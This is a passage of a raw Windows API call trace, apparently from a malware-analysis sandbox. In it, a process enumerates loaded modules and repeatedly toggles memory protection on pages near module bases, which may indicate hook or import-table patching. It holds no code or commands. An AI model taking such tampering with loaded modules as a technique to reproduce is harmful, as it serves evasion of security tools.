NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.708] GetCurrentProcess () returned 0xffffffff [0068.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7580110c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.708] GetCurrentProcess () returned 0xffffffff [0068.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7580110c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.708] GetCurrentProcess () returned 0xffffffff [0068.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801114, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.708] GetCurrentProcess () returned 0xffffffff [0068.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801114, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.708] GetCurrentProcess () returned 0xffffffff [0068.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801118, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.709] GetCurrentProcess () returned 0xffffffff [0068.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75801118, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.709] GetCurrentProcess () returned 0xffffffff [0068.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7580116c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.709] GetCurrentProcess () returned 0xffffffff [0068.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7580116c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.709] GetCurrentProcess () returned 0xffffffff [0068.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758011a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.709] GetCurrentProcess () returned 0xffffffff [0068.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758011a4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.710] GetCurrentProcess () returned 0xffffffff [0068.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758011cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.710] GetCurrentProcess () returned 0xffffffff [0068.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758011cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.710] GetCurrentProcess () returned 0xffffffff [0068.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758011f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.710] GetCurrentProcess () returned 0xffffffff [0068.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x758011f8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75801000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.711] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.711] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.711] GetCurrentProcess () returned 0xffffffff [0068.711] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911b8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.712] GetCurrentProcess () returned 0xffffffff [0068.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911bc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.712] GetCurrentProcess () returned 0xffffffff [0068.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911bc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.712] GetCurrentProcess () returned 0xffffffff [0068.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.712] GetCurrentProcess () returned 0xffffffff [0068.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.712] GetCurrentProcess () returned 0xffffffff [0068.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.713] GetCurrentProcess () returned 0xffffffff [0068.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.713] GetCurrentProcess () returned 0xffffffff [0068.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911ec, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.713] GetCurrentProcess () returned 0xffffffff [0068.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911ec, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.713] GetCurrentProcess () returned 0xffffffff [0068.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911f0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.713] GetCurrentProcess () returned 0xffffffff [0068.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755911f0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.714] GetCurrentProcess () returned 0xffffffff [0068.714] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591204, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.714] GetCurrentProcess () returned 0xffffffff [0068.714] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591204, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.714] GetCurrentProcess () returned 0xffffffff [0068.714] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591210, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.714] GetCurrentProcess () returned 0xffffffff [0068.714] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591210, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.714] GetCurrentProcess () returned 0xffffffff [0068.714] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591250, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.715] GetCurrentProcess () returned 0xffffffff [0068.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591250, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.715] GetCurrentProcess () returned 0xffffffff [0068.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.715] GetCurrentProcess () returned 0xffffffff [0068.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912c0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.715] GetCurrentProcess () returned 0xffffffff [0068.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.715] GetCurrentProcess () returned 0xffffffff [0068.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912c4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.716] GetCurrentProcess () returned 0xffffffff [0068.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.716] GetCurrentProcess () returned 0xffffffff [0068.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912c8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.716] GetCurrentProcess () returned 0xffffffff [0068.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.716] GetCurrentProcess () returned 0xffffffff [0068.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912cc, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.716] GetCurrentProcess () returned 0xffffffff [0068.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.717] GetCurrentProcess () returned 0xffffffff [0068.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912d0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.717] GetCurrentProcess () returned 0xffffffff [0068.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912d8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.717] GetCurrentProcess () returned 0xffffffff [0068.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912d8, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.717] GetCurrentProcess () returned 0xffffffff [0068.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.717] GetCurrentProcess () returned 0xffffffff [0068.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x755912e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.718] GetCurrentProcess () returned 0xffffffff [0068.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7559134c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.718] GetCurrentProcess () returned 0xffffffff [0068.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7559134c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.718] GetCurrentProcess () returned 0xffffffff [0068.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591350, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.718] GetCurrentProcess () returned 0xffffffff [0068.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591350, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.718] GetCurrentProcess () returned 0xffffffff [0068.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591358, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.719] GetCurrentProcess () returned 0xffffffff [0068.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75591358, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75591000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.719] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75581034, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75581000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.720] GetCurrentProcess () returned 0xffffffff [0068.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75581034, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75581000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.720] GetCurrentProcess () returned 0xffffffff [0068.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75581040, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75581000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.720] GetCurrentProcess () returned 0xffffffff [0068.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75581040, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75581000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.720] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.721] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751000e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.721] GetCurrentProcess () returned 0xffffffff [0068.721] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751000e0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.722] GetCurrentProcess () returned 0xffffffff [0068.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751000f4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.722] GetCurrentProcess () returned 0xffffffff [0068.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x751000f4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100140, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.722] GetCurrentProcess () returned 0xffffffff [0068.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100140, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.722] GetCurrentProcess () returned 0xffffffff [0068.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100150, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.723] GetCurrentProcess () returned 0xffffffff [0068.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100150, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.723] GetCurrentProcess () returned 0xffffffff [0068.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7510015c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.723] GetCurrentProcess () returned 0xffffffff [0068.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7510015c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.723] GetCurrentProcess () returned 0xffffffff [0068.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7510016c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.723] GetCurrentProcess () returned 0xffffffff [0068.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x7510016c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.724] GetCurrentProcess () returned 0xffffffff [0068.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x75100180, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x75100000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.724] GetCurrentProcess () returned 0xffffffff [0068.724] NtProtectVirtualMemory 